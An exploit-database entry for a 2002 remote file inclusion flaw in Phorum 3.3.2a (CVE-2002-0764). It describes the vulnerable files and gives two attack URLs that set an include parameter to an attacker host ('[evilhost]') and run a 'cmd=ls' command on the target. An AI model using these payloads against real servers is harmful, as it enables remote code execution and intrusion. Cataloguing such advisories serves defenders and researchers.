[] NeoSense
E X P L O I T S
title author type platform port cve id

Phorum 3.3.2a - Remote Command Execution

Author: markus arndt
type: webapps
platform: php
port: 
date_added: 2002-05-17 
date_updated: 2012-09-22 
verified: 1 
codes: CVE-2002-0764;OSVDB-11141 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/4763/info

Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.

A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands.

The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files.

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.